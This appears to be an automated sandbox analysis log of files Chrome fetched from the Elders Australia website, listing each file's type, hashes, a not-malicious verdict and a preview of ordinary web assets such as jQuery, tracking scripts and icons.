                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (553)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):3681
                                                                                                                                                                                                            Entropy (8bit):5.310615162639586
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:IGUXERTgdf3nfLzeJpMJvAdFADGKCnt0gzCH9Uum33Es3PBH0Or/1mSh/F4ksiiN:BDzFHXz4M3r9LjqziiN
                                                                                                                                                                                                            MD5:011C0FC0D0CF131BDFF879743A353002
                                                                                                                                                                                                            SHA1:9336BA4F6BD99531147F284CF217D473EB6FA3C0
                                                                                                                                                                                                            SHA-256:2DBB30AF18C1CC025D432F934A8B23478A3539D525BFA6100FB097E2DCDAFE57
                                                                                                                                                                                                            SHA-512:0681C12F9DA2507D19D32CE68C2B4A6ACA9F56A8F9BCC5CF3840B1757FD15DE1EF1411069913D566D39933DA586401585DA7481F0762795CF0E4DD64A2410E00
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/etc.clientlibs/clientlibs/granite/jquery/granite.lc-011c0fc0d0cf131bdff879743a353002-lc.min.js
                                                                                                                                                                                                            Preview:(function(g,e){e.Granite=e.Granite||{};e.Granite.$=e.Granite.$||g;e._g=e._g||{};e._g.$=e._g.$||g;var k=Granite.HTTP;g.ajaxSetup({externalize:!0,encodePath:!0,hook:!0,beforeSend:function(h,c){"undefined"!==typeof G_IS_HOOKED&&G_IS_HOOKED(c.url)||(c.externalize&&(c.url=k.externalize(c.url)),c.encodePath&&(c.url=k.encodePathOfURI(c.url)));c.hook&&(h=k.getXhrHook(c.url,c.type,c.data))&&(c.url=h.url,h.params&&("GET"===c.type.toUpperCase()?c.url+="?"+g.param(h.params):c.data=g.param(h.params)))},statusCode:{403:function(h){"Authentication Failed"===.h.getResponseHeader("X-Reason")&&k.handleLoginRedirect()}}});g.ajaxSettings.traditional=!0})(jQuery,this);.(function(g){window.Granite.csrf||(window.Granite.csrf=g(window.Granite.HTTP))})(function(g){function e(){this._handler=[]}function k(a){var b="//"+document.location.host,d=document.location.protocol+b;return a===d||a.slice(0,d.length+1)===d+"/"||a===b||a.slice(0,b.length+1)===b+"/"||!/^(\/\/|http:|https:).*/.test(a)}function h(a){window.con
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):772
                                                                                                                                                                                                            Entropy (8bit):4.3966498802641985
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:twdoqAulEVIO4Rh6cPWgm0R/4XcYRVdL56I7sF0S:6mqaVIOy86IAiS
                                                                                                                                                                                                            MD5:198206BDD32C90F5DE0D10D91FD81833
                                                                                                                                                                                                            SHA1:B611164EF07C0F87EE85823EC554D32540B39C08
                                                                                                                                                                                                            SHA-256:A9674747820E8FE27D55C02996B53ABEBEC5059D5D3B1EFECC6206C46C80E87B
                                                                                                                                                                                                            SHA-512:48F5AB95C937ACF7ABBE9DA03EF2E582A037A919A1AE88C7387F84C0DECD629273A0E06039F0B1CE978F021619027CAF093E796E88F4906F109BA59244C92D30
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:<svg width="20" height="21" viewBox="0 0 20 21" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M19.0007 19.9998L12.0967 13.0958M12.0967 13.0958C12.7094 12.4942 13.1969 11.7773 13.5309 10.9863C13.8649 10.1953 14.039 9.346 14.0429 8.48739C14.0468 7.62878 13.8806 6.77789 13.5539 5.98388C13.2271 5.18987 12.7463 4.46846 12.1392 3.86133C11.532 3.25419 10.8106 2.77336 10.0166 2.4466C9.2226 2.11985 8.37171 1.95364 7.5131 1.95759C6.65449 1.96153 5.80517 2.13555 5.0142 2.46959C4.22322 2.80363 3.50626 3.29107 2.90473 3.90376C1.70425 5.12651 1.03516 6.77384 1.04304 8.48739C1.05091 10.2009 1.73511 11.842 2.94677 13.0537C4.15844 14.2654 5.79956 14.9496 7.5131 14.9575C9.22664 14.9653 10.874 14.2962 12.0967 13.0958V13.0958Z" stroke="#3D3E42" stroke-width="2"/>.</svg>.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):443
                                                                                                                                                                                                            Entropy (8bit):7.296855487645181
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:6v/7ex9HQKeLniSTObPCwfvyQ+gU7rXlYhjueptQvs:PyybZS7dzlZeptQvs
                                                                                                                                                                                                            MD5:EA595ABD27296CACE135E3D050D49111
                                                                                                                                                                                                            SHA1:D9E988853C54439C6FE847FD2800579D3D14B960
                                                                                                                                                                                                            SHA-256:3D0277BB0C2F476E621893EC5125B053A353D62A8434491CCCE82D418E846CF3
                                                                                                                                                                                                            SHA-512:D4518B9CCF8B258B44347591FE677A72906653F5180FB3DD3FAF96A0D2FCC75E83E3DA03573C3652424B477B4685A8F953C228674C2626254053387703909010
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:.PNG........IHDR.............;0......pHYs...........~....mIDATH...M.0....{..{.1.t....@.[.@.P...t.(.\6.,...4+E.y.=...IQ....3c.j.Gx...f...<.)...-...V.....{......;.....k....of..4..:...)..kV....`330./.4...6.I..fw...K.&k....P...m..W..T.p.5zw...^..^(5.Wf.JE......C0R.f3..o.u..U.2W.....3a.(....\p...w.<\.r.^M03.:..)..sq.........#..V.$G...K.....51S..t.....m.uV.......H.bN...Z....1..".t.>....[N$9G]......;..ui...T|q.....R.0>?.....IEND.B`.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 600x400, components 3
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):137787
                                                                                                                                                                                                            Entropy (8bit):7.979539421935738
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:RkWKWJvD0r3NbIN/HiQe4gOW5qFEwKwoZmxLfENvk:RkQ4DYPiQe4PW5SEzHNvk
                                                                                                                                                                                                            MD5:1449892EFC0C94786478F6609C28125D
                                                                                                                                                                                                            SHA1:543F955354ACC99ACE29D1A25F66FC27236B4282
                                                                                                                                                                                                            SHA-256:E13BC940E002D0452E884BA843690457B75D2CC0F9FEFD66F99F0E7093A528D7
                                                                                                                                                                                                            SHA-512:452E7E2C619377774BD603437DCA84B58EC80B1A2B2978AA3169A996E9749B537E7038A0BADAF728D53D61612D5B285189A253E37002462CBD87F27153BBFCDD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:f3eab9c8-c378-41f4-95cc-6e5b32411ff3" xmpMM:DocumentID="xmp.did:D3DA53FA53BD11EFB156A9DD8535B747" xmpMM:InstanceID="xmp.iid:D3DA53F953BD11EFB156A9DD8535B747" xmp:CreatorTool="Adobe Photoshop 24.1 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:69d761ac-ac6e-4ecd-ae24-eb8e472e5d5c" stRef:documentID="adobe:docid:photoshop:6ec06c4c-7df8-ea4c-828b-fc5ea02d2e14"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):244295
                                                                                                                                                                                                            Entropy (8bit):5.454185343611895
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:pfLeYH8AtPJ137OeR8NteqZEbkxZNsucrl0xYurPK713FN:pfLeYc+PJxH8NNfFcrHurPK713j
                                                                                                                                                                                                            MD5:B5322CFCA51C69074051C6B148CE5A6C
                                                                                                                                                                                                            SHA1:A995F0F78FE3147A4BF3D0503F9A123FDDAD0CD0
                                                                                                                                                                                                            SHA-256:55270971FDC4172D5CBBA95DADD779074EADB9C50BF16C2B3253CCC6BC8FC363
                                                                                                                                                                                                            SHA-512:9D1824E860609AF7AB2775ACE28D22DED11D4678B89351B34BC03A54527D7C3029238DE45C126E52150B9A87F9242039679F3A646A2F5C7E46D66EE19BB051BE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                                                                                            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 32 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):817
                                                                                                                                                                                                            Entropy (8bit):7.602031146587345
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:N/61fBUkouE4pvW0D0g6WS3Qv3YMhoyD8x7RQS:N/6FBKgec0g63kNW
                                                                                                                                                                                                            MD5:CE273BDD7D5C78613311F31B1BC77870
                                                                                                                                                                                                            SHA1:CCAD030EC9060D5EB3CBACB77968A9ACAD13C5C9
                                                                                                                                                                                                            SHA-256:0D220766B429A80F4858F1A115F79D746D7A3D873FFBE11233E4A822C5759982
                                                                                                                                                                                                            SHA-512:011B8ABA918ED0807D82A7B98177E2F1190A2426339B5458A68DDB1E6A424CA16BABB1D22204C670FBEC7C9F1FA064AD37A8CFDB80C370FA3AC01CA13334E831
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:.PNG........IHDR... ................pHYs.................sRGB.........gAMA......a.....IDATx..VKR.@....B.O.*.&..N.>A..!'.. .....'.....,..!$U.|6...t[Ra.d.`'...x..o..g......`..'...... No...c.$.D..=S.vk..|3%....BH^.....=."......r..M..r9.-.!..#{..mB8....+..\..M8.|.x...1$$S|.e...E{.@w........DL..f..`7....Yw.._.<........Z.h.3..-... ...s.Q..v....... ..:.-}...3f.V`..n.wD. .0.P.....C.=4..tC#..Q.....n..Z$).wQ.|}........$l...e...#^]..C.-p....G....6K..m)......E%....c..{..t.m.\...=m.H:sc;)%.Y.0.wBd.....x..z.....".\/}.]p.5u ..BhH.(..2...@;....jt_.aw!.!.aX....T>.-.tk.}.q.5.o......V..|....[h.B....!...Aj...7'......p...iw/.+...R.g86.D6TD.U....F?.:2..H.U" ...P.]X..s....8..P...L.pb...2..P...uGOtu'.r7du.2.V.2.L..D... ..Pa2...6A.Z.`..@..}....CT.JS.\Tx..z.....\..Tr.....>.xP...ANi._.'....IEND.B`.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 600x400, components 3
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):172833
                                                                                                                                                                                                            Entropy (8bit):7.97941391640036
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:a+NHthlh12DD+/mmNTIbIhZjNf00ex5+zFwvTn7Q+SfjcwkUm6Ffdcykv:nNHtnh12DDsmpM/FwbuWw9jVkUm6Ufv
                                                                                                                                                                                                            MD5:BE3E5050811DEE216A7A83BED23ADA95
                                                                                                                                                                                                            SHA1:719F99304500468A81FDE12CFB628D6B8B44D974
                                                                                                                                                                                                            SHA-256:9EAF65CC1B0686F3C964D07DE135E84A7AAF1A46F0EBEDB4000F5A28722D54AA
                                                                                                                                                                                                            SHA-512:BB23963B3FB38F3A976D7324785BF957CA6BE322B4070B047E40B6FA612219A8D34F3100B67BCD505E8D87260E2BBBDE5F9BC41EDD1307FC747C8E84F5EF1780
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......d......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:f3eab9c8-c378-41f4-95cc-6e5b32411ff3" xmpMM:DocumentID="xmp.did:B60FE747488D11EEA83687A2E59320CC" xmpMM:InstanceID="xmp.iid:B60FE746488D11EEA83687A2E59320CC" xmp:CreatorTool="Adobe Photoshop 24.1 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:10052fcd-6563-4e0b-8b24-de1c12001c08" stRef:documentID="adobe:docid:photoshop:1b873438-bb99-024a-8e97-98777a8fb36f"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (1116)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):252496
                                                                                                                                                                                                            Entropy (8bit):4.480778565332098
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:OFF46tUR/aipg5faOj8kbNPWlHy2TKd0gQEEIigqyiHpE/EPZ46cdfezQT+7slXm:aUR/aiV+Y/2iek0iB5cgPcPDJdO
                                                                                                                                                                                                            MD5:A85A9D7786B613F2BD9B3190A7DF57E3
                                                                                                                                                                                                            SHA1:8FB6F9F6CAFFE535802F26835C6EA38863BB70B6
                                                                                                                                                                                                            SHA-256:181C24B11E4DF2B0AB06922D556DE3D7444628DFE2F419C9E32709C4F611A5FB
                                                                                                                                                                                                            SHA-512:58310C599AA41D31FA5E0ACD0FB22598B6F509F7120B6FD83A0A3C52DD4B81221D946943B23BB87A060A7428021D390BC94364B39D057D4461B6BD2121A5362D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/
                                                                                                                                                                                                            Preview:<!DOCTYPE HTML>.<html lang="en">.<head>. <meta charset="UTF-8"/>. <title>Home</title>. . . <meta name="template" content="elders---home-page"/>. <meta name="viewport" content="width=device-width, initial-scale=1"/>. . . Facebook -->. <meta property="og:title" content="Home"/>. <meta property="og:type" content=""/>. <meta property="og:description"/>. <meta property="og:url" content="https://elders.com.au/"/>. <meta property="og:site_name" content="Elders"/>. <meta property="og:image" content="https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/png/logo-elders.png"/>.. Twitter -->. <meta name="twitter:title" content="Home"/>. <meta name="twitter:description"/>. <meta name="twitter:url" content="https://elders.com.au/"/>. <meta name="twitter:image" content="https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/png/logo-elders.png"/>.. Apple Number Click
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):211
                                                                                                                                                                                                            Entropy (8bit):4.969901501689543
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:tIsqDmJS4RKb5nJEWvoXSK7AASKcvXjXRHgAEvlQVA8cXbLErFWFAmYHZAAbBWah:tI9mc4slnJ/wXDcA4noZcR3mqZllWq4I
                                                                                                                                                                                                            MD5:E4765EF64FAAF1BFA94BC2D68A3B16E2
                                                                                                                                                                                                            SHA1:70EA0BEA959B765AF8A9874170CF71AEE903EDA0
                                                                                                                                                                                                            SHA-256:493A230BCE655674730B4F4AFD752658F24C0FE643001DAD61C1EE99D070E9C3
                                                                                                                                                                                                            SHA-512:355BD63D4BF814925B951DBFA950079378FAFBB7C95F4BABE46E0588272D866A91B74706C224672B26E32ACC638893C883C8611A5FC183E56575F17E15B65EC9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" class="h-6 w-6" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2">. <path stroke-linecap="round" stroke-linejoin="round" d="M19 9l-7 7-7-7" />.</svg>
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65472)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):151775
                                                                                                                                                                                                            Entropy (8bit):5.310612558975077
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:7RwVezu8jPgro1A29AaiWqSrdNgKTPhB/B1pLD:7RwsuuPgroSEBiNSR7B/R
                                                                                                                                                                                                            MD5:46A2DF1A9BFAEEFFBD5B53738ED986E6
                                                                                                                                                                                                            SHA1:D60EA1E3103A34CD5AB43950A9559F2DE478F769
                                                                                                                                                                                                            SHA-256:90A2617361565EFD206F9AAD7188BB03F52B7CE94143CA44E51C5F85C861D384
                                                                                                                                                                                                            SHA-512:52F105577E6A6D7128A270B81C6520DF57A181C36938DEA5BCBF4A93D6CFF832BBFD468C9D9A9847271ACA4AB4FD2ACF6D779B05C90F10342176B9EF33A3AC2D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:/*! For license information please see site.js.LICENSE.txt */.!function(){var e={616:function(e,t){var n;!function(t,n){"use strict";"object"==typeof e.exports?e.exports=t.document?n(t,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return n(e)}:n(t)}("undefined"!=typeof window?window:this,(function(r,o){"use strict";var i=[],a=Object.getPrototypeOf,s=i.slice,l=i.flat?function(e){return i.flat.call(e)}:function(e){return i.concat.apply([],e)},c=i.push,u=i.indexOf,d={},p=d.toString,f=d.hasOwnProperty,h=f.toString,m=h.call(Object),g={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},b=r.document,w={type:!0,src:!0,nonce:!0,noModule:!0};function x(e,t,n){var r,o,i=(n=n||b).createElement("script");if(i.text=e,t)for(r in w)(o=t[r]||t.getAttribute&&t.getAttribute(r))&&i.setAttribute(r,o);n.head.appendChild(i).parentNode.removeChild(i)}function L(e){return nu
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65441), with CRLF line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):67020
                                                                                                                                                                                                            Entropy (8bit):5.351351018429131
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:+zDEeJ7Yolr3DoUzaOGoKrsKPIdRMdOYkyJ+nMFvm87o6d0h2hNVRjy4MSbtzfWP:gD/9Yolr3D4M5yJ+nQveP4MSBaz
                                                                                                                                                                                                            MD5:49CDC2AA4517A0912673006E2106BA07
                                                                                                                                                                                                            SHA1:13D2AB6037F731E2D644D8D590D1D73DC82F68C7
                                                                                                                                                                                                            SHA-256:6CBFDDB4735BDCA8B4D594C0222541A0AA1F53EE6B4359647960ED164F595863
                                                                                                                                                                                                            SHA-512:98F19F2F291CD1C6D5441DB248D762CB864C7BF3F0123AFC24392CBBCEB9EE1B7803DC7577231B82623BC1A4865E98B569E5217C2F7EE276BC5E4ADB8CFD9FEB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://www.clarity.ms/s/0.7.53/clarity.js
                                                                                                                                                                                                            Preview:/* clarity-js v0.7.53: https://github.com/microsoft/clarity (License: MIT) */..!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return sr},get start(){return cr},get stop(){return lr},get track(){return ar}}),e=Object.freeze({__proto__:null,get clone(){return Cr},get compute(){return Dr},get data(){return Er},get keys(){return Or},get reset(){return Ar},get start(){return _r},get stop(){return Rr},get trigger(){return Ir},get update(){return jr}}),n=Object.freeze({__proto__:null,get check(){return Xr},get compute(){return qr},get data(){return Sr},get start(){return Wr},get stop(){return Ur},get trigger(){return Yr}}),a=Object.freeze({__proto__:null,get compute(){return Kr},get data(){return Fr},get log(){return Gr},get reset(){return Zr},get start(){return Br},get stop(){return Jr},get updates(){return Vr}}),r=Object.freeze({__proto__:null,get callback(){return si},get callbacks(){return ti},get clear(){return ci},get consent(){return ui},get data(){return $r},
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (701)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):558800
                                                                                                                                                                                                            Entropy (8bit):5.6661858145390775
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:HHe/N32Dr0RnSXaKyEtG76ZKj1wa89jzQoDjU3+VLs/k5lS64cflFT3O01d:eMapiBMKZxRflF3d
                                                                                                                                                                                                            MD5:88A5FED5C87B1D3704AB225CFBE7A130
                                                                                                                                                                                                            SHA1:D64243C18FBAA356E4ABAE8414CCC4772D64060B
                                                                                                                                                                                                            SHA-256:F8E5F5CE9FF44073CFF24BCD3D2B8AA4E67B67891B14FF929FE4743880FDF82E
                                                                                                                                                                                                            SHA-512:8B8D1C9F4C36FD2383C96D0D484A6692F70422934BCCD3DB1F0787E1B753F7D5A8F0C91934805C4D865AED3D4673FF478F0AE23746D0C0E005E60848543B3D33
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var k=function(){return[function(n,S,D,d,Z,l,h,R,O){return(((n^53)&19)==((n&((((R=[34,2,46],n|72)==n&&(O=St(function(G,A,L){return L=(A=(G=function(f,H){return(f[(H=["replace","indexOf","trim"],H)[1]](d)!=-1&&(f=f.slice(f[H[1]](d))),f)[H[0]](/\s+/g,S)[H[0]](/\n/g,Z)[H[2]]()},G(Z+l)),G(Z+h)),A==L},D)),n)|56)==n&&(h=["https","",0],D=="*"?O="*":(d=g[R[2]](24,!0,h[1],new OI(D)),l=N[30](58,d,h[1]),Z=N[36](25,h[1],g[40](40,l,h[1]),v[21](R[1],1,S,D)),Z.D!=S||(Z.A==h[0]?E[30](90,h[R[1]],443,Z):Z.A=="http"&&.E[30](96,h[R[1]],80,Z)),O=Z.toString())),11))==n&&b.call(this,S),1)&&(O=x[42](16,C[42](44,v[R[0]](23,12),S),[u[20](3
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):443
                                                                                                                                                                                                            Entropy (8bit):7.296855487645181
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:6v/7ex9HQKeLniSTObPCwfvyQ+gU7rXlYhjueptQvs:PyybZS7dzlZeptQvs
                                                                                                                                                                                                            MD5:EA595ABD27296CACE135E3D050D49111
                                                                                                                                                                                                            SHA1:D9E988853C54439C6FE847FD2800579D3D14B960
                                                                                                                                                                                                            SHA-256:3D0277BB0C2F476E621893EC5125B053A353D62A8434491CCCE82D418E846CF3
                                                                                                                                                                                                            SHA-512:D4518B9CCF8B258B44347591FE677A72906653F5180FB3DD3FAF96A0D2FCC75E83E3DA03573C3652424B477B4685A8F953C228674C2626254053387703909010
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            URL:https://elders.com.au/content/dam/eld/icons---logos/icons/icon_farm_supplies.png
                                                                                                                                                                                                            Preview:.PNG........IHDR.............;0......pHYs...........~....mIDATH...M.0....{..{.1.t....@.[.@.P...t.(.\6.,...4+E.y.=...IQ....3c.j.Gx...f...<.)...-...V.....{......;.....k....of..4..:...)..kV....`330./.4...6.I..fw...K.&k....P...m..W..T.p.5zw...^..^(5.Wf.JE......C0R.f3..o.u..U.2W.....3a.(....\p...w.<\.r.^M03.:..)..sq.........#..V.$G...K.....51S..t.....m.uV.......H.bN...Z....1..".t.>....[N$9G]......;..ui...T|q.....R.0>?.....IEND.B`.
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (1653)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1800
                                                                                                                                                                                                            Entropy (8bit):5.527858380938343
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:h6bLt/B26bBfdwSKKWA8PGdwSKKXAIOP/B:h2BB2qCRFPPJRcxOP/B
                                                                                                                                                                                                            MD5:28400EE7BA0A3A5E5EE5C09C1F2E6353
                                                                                                                                                                                                            SHA1:A1AE59765A3FC0AE93F564489AE1BE7F8D9F83B6
                                                                                                                                                                                                            SHA-256:A2AEDBF833ED5A8601653D379C6B33EB4A8177DD1DB4302B8BDC372DAC7B8C80
                                                                                                                                                                                                            SHA-512:1E62957340D27B6AEAB6A579DF984512090E27972264B2BDA68E0EFF7646EDA96D8EC802216AE910CFEC46226B18278FB18660231C9B6C952C37FD40D7C7E79F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Preview:// For license information, see `https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567c-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567c-source.min.js', "<script>\nconsole.log('Global | Ad Pixel Started');\n</script>\n\n Meta Pixel Code -->\n<script>\n!function(f,b,e,v,n,t,s)\n{if(f.fbq)return;n=f.fbq=function(){n.callMethod?\nn.callMethod.apply(n,arguments):n.queue.push(arguments)};\nif(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';\nn.queue=[];t=b.createElement(e);t.async=!0;\nt.src=v;s=b.getElementsByTagName(e)[0];\ns.parentNode.insertBefore(t,s)}(window, document,'script',\n'https://connect.facebook.net/en_US/fbevents.js');\nfbq('init', '842278510644971');\nfbq('track', 'PageView');\n</script>\n<noscript><img height=\"1\" width=\"1\" style=\"display:none\"\nsrc=https://www.facebook.com/tr?id=842278510644971&ev=PageView&noscript=1\n
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (538)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):8529
                                                                                                                                                                                                            Entropy (8bit):5.53641559082188
                                                                                                                                                                                                            Encrypted:false
